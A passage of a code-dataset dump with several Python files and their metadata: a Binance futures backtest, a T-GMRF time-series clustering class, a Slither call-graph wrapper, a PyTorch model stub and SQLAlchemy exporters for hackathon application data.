%.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))\n elif order.issell():\n self.log('SELL EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))#, cerebro.broker.getvalue()\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled]:\n self.log('Order Canceled')\n elif order.status in [order.Margin]:\n self.log('Order Margin')\n elif order.status in [order.Rejected]:\n self.log('Order Rejected') \n\n # Write down: no pending order\n self.order = None\n \n def stop(self):\n self.order = self.order_target_size(target=0) \n self.log('STOP')\n self.log('CURRENT POSITION: %.8f' %self.getposition(self.data).size)\n self.log('TEST COUNT: %d' %self.nextcount)\n self.f.close()\n \n def next(self): \n self.nextcount = self.nextcount + 1\n self.log('Close, %.8f' %(self.dataclose[0]))\n \n if self.order:\n return\n\n\n # Check if we are in the market\n if not self.position:\n # print(len(self.dataclose))\n # print(self.datas[0].datetime.get(size=len(self.dataclose)))\n coldata_time = self.data.datetime.get(size=len(self.dataclose))\n coldata_open = self.data.open.get(size=len(self.dataclose))\n coldata_high = self.data.high.get(size=len(self.dataclose))\n coldata_low = self.data.low.get(size=len(self.dataclose))\n coldata_close = self.data.close.get(size=len(self.dataclose))\n coldata_volume = self.data.volume.get(size=len(self.dataclose))\n df_new = pd.DataFrame({'open': coldata_open,\n 'high': coldata_high,\n 'low': coldata_low,\n 'close': coldata_close,\n 'volume': coldata_volume})\n df_new.index = pd.to_datetime(df_new.index, format = '%Y-%m-%d %H:%M:%S')\n df_new.index.name = 'dateTime'\n\n direction, pexec, pslimit, psloss = StrategyN(self.p.Strategy_idx)(df_new)\n\n \n #sanity check\n if direction == OrderDirection.BUY and (pexecpsloss or pslimit>pexec):\n direction = OrderDirection.NOTHING\n \n if direction == OrderDirection.BUY:\n self.order_size = self.singleposloss/(pexec-psloss)\n self.log('BUY CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss))\n self.order = self.buy_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n \n \n elif direction == OrderDirection.SELL: \n self.order_size = self.singleposloss/(psloss-pexec)\n self.log('SELL CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss)) \n self.order = self.sell_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n\n\n\n# Create a cerebro entity\n \ndef run_backtest(target_pair, Strategy_idx, backtest_days):\n cerebro = bt.Cerebro()\n # df.to_csv('rawdata.csv',index=False)\n df = pd.read_csv('./1h_all/' + target_pair + '.csv', index_col=\"dateTime\", infer_datetime_format=True, parse_dates=True)\n df = df[[\"open\", \"high\", \"low\", \"close\", \"volume\"]]\n df.columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n # df = df.tail(24*30*2)#60days backtest\n \n df.to_csv('./backtest/' + target_pair + '.csv')\n \n \n \n\n \n\n \n # Add a strategy\n cerebro.addstrategy(TestStrategy, Strategy_idx=Strategy_idx, backtest_days=backtest_days, len_df=len(df))\n \n\n # Datas are in a subfolder of the samples. Need to find where the script is\n # because it could have been called from anywhere\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\n datapath = os.path.join(modpath, './backtest/' + target_pair + '.csv')\n \n rawdata = bt.feeds.GenericCSVData(\n dataname=datapath,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n name='rawdata',\n openinterest=-1\n )\n cerebro.adddata(rawdata)\n \n \n cerebro.resampledata(\n rawdata, \n timeframe=bt.TimeFrame.Days, #timeframe=bt.TimeFrame.Minutes, \n compression=1, #compression=60*8, \n name='daydata'\n )#8HR S/R\n # cerebro.adddata(pivotdata)\n \n cerebro.addobserver(bt.observers.Benchmark,\n timeframe=bt.TimeFrame.Weeks\n )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n # 1.6 - 1.9 Below average\n # 2.0 - 2.4 Average\n # 2.5 - 2.9 Good\n # 3.0 - 5.0 Excellent\n # 5.1 - 6.9 Superb\n # 7.0 - Holy Grail?\n \n # Set our desired cash start\n cerebro.broker.setcash(162*10.0)\n \n \n \n # Print out the starting conditions\n print('Starting Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue()\n # Run over everything\n # cerebro.run(runonce=False)\n strategies = cerebro.run()\n firstStrat = strategies[0]\n \n # Print out the final result\n print('Final Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue() - myportfolio\n # cerebro.plot(style=\"candle\", iplot=False)\n \n # b = Bokeh(filename='chart.html', style='bar', plot_mode='single', scheme=Tradimo())\n # cerebro.plot(b, iplot=False)\n \n \n \n sqn = firstStrat.analyzers[1].get_analysis()['sqn']\n trades = firstStrat.analyzers[1].get_analysis()['trades']\n\n \n return sqn, trades, myportfolio\n\nif __name__ == '__main__':\n \n try:\n target_pair = (sys.argv[1])\n Strategy_idx = (sys.argv[2])\n backtest_days = (sys.argv[3])\n except:\n target_pair = \"BTCUSDT\"\n Strategy_idx = 3#3:0.6, 4:0.3\n backtest_days = 7\n \n run_backtest(target_pair, Strategy_idx, backtest_days)\n ", "repo_name": "hunej/BinanceFuturesQuanTradingFramework", "sub_path": "mybacktest.py", "file_name": "mybacktest.py", "file_ext": "py", "file_size_in_byte": 9532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 42, "usage_type": "attribute"}, {"api_name": "backtrader.Strategy", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backtrader.num2date", "line_number": 61, "usage_type": "call"}, {"api_name": "backtrader.indicators.SimpleMovingAverage", "line_number": 80, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 203, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 204, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 204, "usage_type": "name"}, {"api_name": "backtrader.feeds.GenericCSVData", "line_number": 206, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 206, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 217, "usage_type": "attribute"}, {"api_name": "backtrader.observers", "line_number": 223, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 224, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 226, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 269, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 270, "usage_type": "attribute"}]} +{"seq_id": "27380021021", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:14:30 2020\n\n@author: vito\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom Solver.TGMRF_solver import TGMRF_solver\nfrom time import time\nimport os\nimport pickle as pkl\n\nclass TGMRF:\n \"\"\"\n The implementation is Time-varying Gaussian Markov Random Feilds based clustering algorithm\n \n Parameters\n ----------\n \"\"\"\n def __init__(self, epsilon=50, width=10, stride=1, maxIters=30, lr=0, lamb=1e-2, beta=1e-2, measure=\"euclidean\", verbose=True, verbose_ADMM=False,dimension_reduce=True,dataset_name=\"Test\",use_dump=False,maxIters_ADMM=1000):\n self.epsilon = epsilon\n self.width = width\n self.stride = stride\n self.measure = measure\n self.maxIters = maxIters\n self.lr =lr\n self.lamb = lamb\n self.beta = beta\n self.verbose = verbose\n self.project_matrix = None\n self.initilizing = False\n self.verbose_ADMM = verbose_ADMM\n self.dimension_reduce = dimension_reduce\n self.dataset_name = dataset_name\n self.use_dump = use_dump\n self.maxIters_ADMM = maxIters_ADMM\n \n def triangle_l_2_matrix_l(self, l):\n n = int((-1 + np.sqrt(1+ 8*l))/2)\n return n\n \n def upper2Full(self, a):\n n = self.triangle_l_2_matrix_l(a.shape[0])\n A = np.zeros([n,n])\n A[np.triu_indices(n)] = a\n temp = A.diagonal()\n A = (A + A.T) - np.diag(temp)\n return A\n \n def predict(self, X):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n C_trans : array, shape [n_samples, k]\n Compacted vectors of T-GMRF after PCA\n \"\"\"\n if not type(self.project_matrix) is np.ndarray:\n raise RuntimeError('Please fitting the model beforehand!')\n\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n m_lengths = X.shape[2]\n l_features = X.shape[1]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, initilizing=self.initilizing, verbose_ADMM=self.verbose_ADMM,maxIters_ADMM=self.maxIters_ADMM)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n\n # Projecting the features\n C_trans = np.dot(C_normalize.T, self.project_matrix)\n\n return C_trans\n \n def fit_transform(self, X):\n \"\"\"\n Transform X todistance matrix.\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n distance : array, shape [n_samples, n_samples]\n similarity distance matrix.\n ...\n Other useful data structure.\n \"\"\"\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n l_features = X.shape[1]\n m_lengths = X.shape[2]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = 0, 0, 0, 0\n\n start = time()\n\n dump_file = f\"./dump/{self.dataset_name}/T_GMRF_{self.dataset_name}_dump.pkl\"\n\n if not os.path.exists(dump_file) or not self.use_dump:\n\n if self.dataset_name in ['EEG', \"DuckDuckGeese\", \"FingerMovements\"]:\n initilizing = True\n else:\n initilizing = False\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, verbose_ADMM=self.verbose_ADMM,initilizing=initilizing)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n \n if self.use_dump:\n output = open(dump_file, 'wb')\n pkl.dump(self.C, output)\n else:\n output = open(dump_file, 'rb')\n self.C = pkl.load(output)\n \n duration = time() - start\n \n # normalizing C\n \"\"\"\n # worsen performance for z-normalize\n # the l2-norm normalization is applied\n quantile_transformer = preprocessing.QuantileTransformer(\n output_distribution='normal', random_state=0)\n C = quantile_transformer.fit_transform(C)\n \"\"\"\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n # keep original feature\n # C_normalize = self.C\n \n if self.dimension_reduce:\n \n try:\n reduce_dump = f\"./dump/{self.dataset_name}/Reduce_{self.dataset_name}_dump.pkl\"\n use_reduce_dump = False\n if not os.path.exists(reduce_dump) or not use_reduce_dump:\n\n # Covariance of C\n Sigma_c = np.cov(C_normalize)\n \n # Run SVD algorithm onto covariance matrix of C\n u, s, vh = np.linalg.svd(Sigma_c, full_matrices=True)\n\n if use_reduce_dump:\n reduce = open(reduce_dump, 'wb')\n pkl.dump((Sigma_c, u, s, vh), reduce)\n else:\n reduce = open(reduce_dump, 'rb')\n Sigma_c, u, s, vh = pkl.load(reduce)\n \n # According to the energy content threshold, select the first k eigenvectors\n totally_variance = sum(s)\n k = len(s)\n for i in range(len(s), 0, -1):\n if sum(s[:i])/totally_variance*100 < self.epsilon:\n k = i + 1\n break\n \n # Projecting the features\n C_trans = np.dot(C_normalize.T, u[:, :k])\n\n # dump the projecting matrix\n self.project_matrix = u[:, :k]\n except:\n pca = PCA(n_components=8) # DuckDuckGeese:8\n C_trans = pca.fit_transform(C_normalize.T)\n else:\n C_trans = C_normalize.T\n \n return C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters\n\n def fit(self, X_train, X_test):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n None\n \"\"\"\n\n X = np.concatenate((X_train, X_test), axis=0)\n\n C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = self.fit_transform(X)\n \n C_trans_train = C_trans[:X_train.shape[0]]\n\n C_trans_test = C_trans[-X_test.shape[0]:]\n\n return C_trans, C_trans_train, C_trans_test", "repo_name": "Vitoom/T-GMRF", "sub_path": "TGMRF.py", "file_name": "TGMRF.py", "file_ext": "py", "file_size_in_byte": 8544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 142, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.cov", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 186, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 226, "usage_type": "call"}]} +{"seq_id": "71764659047", "text": "import subprocess # library used to interact with command line\nimport os\nimport re\nfrom graphviz import Source\n\n# slither proxy class for grnrrating the call graph\nclass SlitherProxy:\n def __init__(self):\n self.current_dir = os.getcwd()\n self.output_folder = self.current_dir\n\n def genCallGraph(self, contractName):\n try:\n subprocess.run(['slither', contractName, '--print', 'call-graph'])\n call_graph_filename = f'{contractName}.all_contracts.call-graph.dot'\n call_graph_path = os.path.join(self.output_folder, call_graph_filename)\n\n if os.path.exists(call_graph_path):\n call_graph_png_path = os.path.join(self.output_folder, f'{contractName}.all_contracts.call-graph.dot.png')\n graph_source = Source.from_file(call_graph_path, format=\"png\")\n graph_source.render(view=False) # Optional: Open the PNG file after rendering\n print(f\"Call Graph saved to: {call_graph_path}\")\n return call_graph_png_path\n else:\n print(\"Error: Call graph file not created.\")\n except subprocess.CalledProcessError as e:\n print(f\"Error executing Slither: {e}\")\n #def highlightCallGraph(self, contractName):\n def genListOf_VarFun(self, contractName, output_file='output.txt'):\n # command to generate list of state variables and functions\n subprocess.run(['slither', contractName, '--print', 'vars-and-auth'])\n with open(output_file, 'w') as output_file:\n result = subprocess.run(['slither', contractName, '--print', 'vars-and-auth'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n cleaned_output = re.sub(r'\\x1b\\[[0-9;]*[mK]', '', result.stdout + result.stderr) # Remove ANSI escape codes\n output_file.write(cleaned_output)\n def get_state_variables(self, output_file_path):\n # Read the content of the output.txt file\n with open(output_file_path, 'r') as file:\n output_content = file.read()\n\n # Find all matches for state variables\n state_variables_matches = re.findall(r'\\|\\s+(\\w+)\\s+\\|\\s+\\[([^]]*)\\]\\s+\\|', output_content)\n\n # Extract state variables excluding those starting with '_'\n state_variables = [var.strip(\"'\") for function, variables in state_variables_matches for var in variables.split(', ') if not var.strip(\"'\").startswith('_')]\n\n # Remove duplicates\n state_variables = list(set(state_variables))\n\n return state_variables\n\n# Example usage:\n# result = subprocess.run(['slither', contractPath, '--print', 'vars-and-auth']\n # , shell=True, capture_output=True)\n # # Access the output\n # output = result.stdout\n # return output\n\n\n\n\n", "repo_name": "zainab-yousaf/FYP-Fuzzing", "sub_path": "slither.py", "file_name": "slither.py", "file_ext": "py", "file_size_in_byte": 2788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "graphviz.Source.from_file", "line_number": 20, "usage_type": "call"}, {"api_name": "graphviz.Source", "line_number": 20, "usage_type": "name"}, {"api_name": "subprocess.CalledProcessError", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 33, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "34460881121", "text": "import torch\n\nfrom music_genre_classification.models.classification_model import (\n TorchMertClassIncrementalModel,\n)\n\n\nclass TorchL2PClassIncrementalModel(TorchMertClassIncrementalModel):\n def forward(self, inputs: torch.Tensor):\n outputs, key_loss = self.encoder(inputs)\n outputs = self.decoder(outputs)\n return outputs, key_loss\n", "repo_name": "pedrocg42/music-genre-classification", "sub_path": "music_genre_classification/models/torch_l2p_class_incremental_model.py", "file_name": "torch_l2p_class_incremental_model.py", "file_ext": "py", "file_size_in_byte": 359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "music_genre_classification.models.classification_model.TorchMertClassIncrementalModel", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "19629383239", "text": "from sqlalchemy import Integer, cast, extract, func\nfrom sqlalchemy.future import select\n\nfrom common.database import Application, ApplicationStatus, Participant, School\n\nfrom .base import Exporter\n\n\nclass MLHRegistered(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Age\",\n \"Email\",\n \"School\",\n \"Phone number\",\n \"Country\",\n \"Level of study\",\n \"Acknowledged checkboxes\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Participant.email,\n School.name,\n Application.phone_number,\n Application.country,\n Application.level_of_study,\n Application.legal_agreements_acknowledged,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n\n\nclass ResumeBook(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Age\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of study\",\n \"Graduation year\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Has Resume?\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.portfolio_url,\n Application.vcs_url,\n Application.resume != None,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n .where(Application.status == ApplicationStatus.ACCEPTED)\n .where(Application.share_information)\n )\n\n\nclass All(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Phone Number\",\n \"Age\",\n \"Gender\",\n \"Race / Ethnicity\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of Study\",\n \"Graduation Year\",\n \"Hackathons Attended\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Share Information?\",\n \"Checked-in?\",\n \"Status\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n Application.phone_number,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.gender,\n Application.race_ethnicity,\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.hackathons_attended,\n Application.portfolio_url,\n Application.vcs_url,\n Application.share_information,\n Participant.checked_in,\n Application.status,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "tasks/handlers/integration/export/applications.py", "file_name": "applications.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Exporter", "line_number": 9, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 33, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 33, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 22, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 23, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 23, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 25, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 26, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 26, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 27, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 28, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 28, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 29, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 29, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 30, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 30, "usage_type": "name"}, {"api_name": "common.database.Application.legal_agreements_acknowledged", "line_number": 31, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 31, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 38, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 68, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 54, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 55, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 55, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 56, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 58, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 59, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 59, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 60, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 61, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 61, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 62, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 63, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 64, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 64, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 65, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 65, "usage_type": "name"}, {"api_name": "common.database.Application.resume", "line_number": 66, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 66, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.ApplicationStatus.ACCEPTED", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.ApplicationStatus", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 71, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 75, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 117, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 117, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 97, "usage_type": "call"}, {"api_name": 